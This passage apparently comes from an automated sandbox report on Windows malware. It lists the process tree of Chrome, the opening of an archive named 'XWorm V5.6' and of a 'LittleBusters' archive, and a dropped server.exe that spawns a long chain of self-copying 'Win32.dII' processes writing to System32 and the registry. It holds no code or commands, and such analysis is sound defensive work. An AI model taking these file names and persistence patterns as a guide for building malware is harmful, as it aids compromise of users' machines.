  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3464 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:1
  2⤵
  PID:1592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3428 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:1
  2⤵
  PID:1780
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2484 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:8
  2⤵
  PID:2340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3868 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:1
  2⤵
  PID:1648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:8
  2⤵
  PID:2612
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=1860 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:1
  2⤵
  PID:3020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=4112 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:1
  2⤵
  PID:3000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4264 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:8
  2⤵
  PID:3056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=4388 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:1
  2⤵
  PID:2076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4492 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:8
  2⤵
  PID:1808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4280 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:8
  2⤵
  PID:1732
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4628 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:8
  2⤵
  PID:2168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4640 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:8
  2⤵
  PID:2656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=3932 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:1
  2⤵
  PID:1704
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=1716 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:1
  2⤵
  PID:2336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=1068 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:1
  2⤵
  PID:2180
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4480 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:8
  2⤵
  PID:844
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4428 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:8
  2⤵
  PID:2148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4192 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:8
  2⤵
  PID:2636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4172 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:8
  2⤵
  PID:2600
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4436 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:8
  2⤵
  PID:1704
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4172 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:8
  2⤵
  PID:1096
- C:\Users\Admin\Downloads\7z2409-x64.exe
  "C:\Users\Admin\Downloads\7z2409-x64.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Modifies registry class
  PID:1304
- C:\Windows\system32\rundll32.exe
  "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Downloads\XWorm V5.6.7z
  2⤵
  - Loads dropped DLL
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:2684
- - C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\XWorm V5.6.7z"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of FindShellTrayWindow
    PID:1440
  - - C:\Users\Admin\AppData\Local\Temp\7zO0A57F5D9\Xworm V5.6.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO0A57F5D9\Xworm V5.6.exe"
      4⤵
      Executes dropped EXE
      PID:900
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 900 -s 728
        5⤵
        
        PID:1936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=1308 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:1
  2⤵
  PID:2644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=3312 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:1
  2⤵
  PID:1636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=4132 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:1
  2⤵
  PID:1492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2588 --field-trial-handle=1228,i,12104505986784438174,2629583003449015365,131072 /prefetch:8
  2⤵
  PID:1596
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\LittleBusters 2.10.7z"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  PID:3068
- - C:\Users\Admin\AppData\Local\Temp\7zOCFB5817E\server.exe
    "C:\Users\Admin\AppData\Local\Temp\7zOCFB5817E\server.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:628
  - - C:\Windows\SERVER.EXE
      "C:\Windows\SERVER.EXE"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:2220
    - - C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2700
      - C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        6⤵
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:852
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        7⤵
        Executes dropped EXE
        
        PID:1056
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1764
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3004
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        10⤵
        Executes dropped EXE
        Drops file in System32 directory
        Modifies registry class
        
        PID:1408
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        11⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:2884
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        12⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1060
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        13⤵
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:768
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        14⤵
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:2868
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        15⤵
        Executes dropped EXE
        
        PID:564
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        16⤵
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:1352
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        17⤵
        Executes dropped EXE
        
        PID:1164
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        18⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2216
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        19⤵
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:1600
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        20⤵
        Executes dropped EXE
        
        PID:1604
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        21⤵
        Executes dropped EXE
        
        PID:1292
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        22⤵
        Executes dropped EXE
        
        PID:696
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        23⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:2820
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        24⤵
        Executes dropped EXE
        
        PID:896
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        25⤵
        Executes dropped EXE
        
        PID:2176
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        26⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:2964
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        27⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1780
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        28⤵
        Executes dropped EXE
        Drops file in System32 directory
        Modifies registry class
        
        PID:2564
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        29⤵
        Executes dropped EXE
        
        PID:2524
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        30⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:2312
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        31⤵
        Executes dropped EXE
        
        PID:1680
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        32⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:2084
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        33⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:1784
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        34⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2192
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        35⤵
        Executes dropped EXE
        
        PID:2344
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        36⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1284
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        37⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:2112
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        38⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:1156
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        39⤵
        Executes dropped EXE
        Drops file in System32 directory
        Modifies registry class
        
        PID:3052
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        40⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:2092
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        41⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:572
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        42⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3040
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        43⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1096
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        44⤵
        Executes dropped EXE
        Drops file in System32 directory
        Modifies registry class
        
        PID:2924
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        45⤵
        Executes dropped EXE
        
        PID:2600
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        46⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:2492
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        47⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:2432
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        48⤵
        Executes dropped EXE
        Drops file in System32 directory
        Modifies registry class
        
        PID:2648
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        49⤵
        Executes dropped EXE
        Drops file in System32 directory
        Modifies registry class
        
        PID:1848
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        50⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:2992
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        51⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:540
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        52⤵
        Executes dropped EXE
        
        PID:1860
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        53⤵
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:2612
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        54⤵
        Executes dropped EXE
        
        PID:2204
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        55⤵
        Executes dropped EXE
        
        PID:2984
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        56⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1808
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        57⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1916
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        58⤵
        Executes dropped EXE
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1328
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        59⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1044
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        60⤵
        
        PID:964
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        61⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:2816
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        62⤵
        Drops file in System32 directory
        Modifies registry class
        
        PID:596
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        63⤵
        Drops file in System32 directory
        
        PID:1708
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        64⤵
        System Location Discovery: System Language Discovery
        
        PID:3036
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        65⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:2412
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        66⤵
        System Location Discovery: System Language Discovery
        
        PID:692
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        67⤵
        
        PID:1648
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        68⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:776
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        69⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:2908
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        70⤵
        Modifies registry class
        
        PID:1100
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        71⤵
        
        PID:1052
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        72⤵
        
        PID:1816
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        73⤵
        Modifies registry class
        
        PID:2232
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        74⤵
        Drops file in System32 directory
        
        PID:304
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        75⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:2980
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        76⤵
        
        PID:3000
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        77⤵
        
        PID:2532
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        78⤵
        Drops file in System32 directory
        
        PID:2244
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        79⤵
        System Location Discovery: System Language Discovery
        
        PID:2752
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        80⤵
        
        PID:2408
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        81⤵
        Drops file in System32 directory
        
        PID:352
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        82⤵
        System Location Discovery: System Language Discovery
        
        PID:2080
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        83⤵
        System Location Discovery: System Language Discovery
        
        PID:2896
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        84⤵
        System Location Discovery: System Language Discovery
        
        PID:1712
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        85⤵
        Modifies registry class
        
        PID:2512
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        86⤵
        Drops file in System32 directory
        
        PID:1664
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        87⤵
        System Location Discovery: System Language Discovery
        
        PID:2124
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        88⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:2584
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        89⤵
        
        PID:2440
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        90⤵
        
        PID:2836
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        91⤵
        
        PID:2076
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        92⤵
        Modifies registry class
        
        PID:2448
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        93⤵
        
        PID:3008
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        94⤵
        Drops file in System32 directory
        
        PID:2404
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        95⤵
        Drops file in System32 directory
        Modifies registry class
        
        PID:1040
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        96⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:444
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        97⤵
        Drops file in System32 directory
        
        PID:2628
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        98⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:316
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        99⤵
        Drops file in System32 directory
        Modifies registry class
        
        PID:1032
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        100⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:340
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        101⤵
        
        PID:2548
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        102⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:2004
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        103⤵
        
        PID:2900
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        104⤵
        
        PID:1924
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        105⤵
        Drops file in System32 directory
        Modifies registry class
        
        PID:2572
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        106⤵
        System Location Discovery: System Language Discovery
        
        PID:2336
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        107⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:2764
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        108⤵
        System Location Discovery: System Language Discovery
        
        PID:708
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        109⤵
        
        PID:1508
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        110⤵
        Drops file in System32 directory
        Modifies registry class
        
        PID:3016
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        111⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1596
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        112⤵
        Modifies registry class
        
        PID:3020
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        113⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:2732
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        114⤵
        
        PID:996
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        115⤵
        
        PID:952
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        116⤵
        
        PID:1016
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        117⤵
        
        PID:1768
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        118⤵
        
        PID:2776
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        119⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1592
        
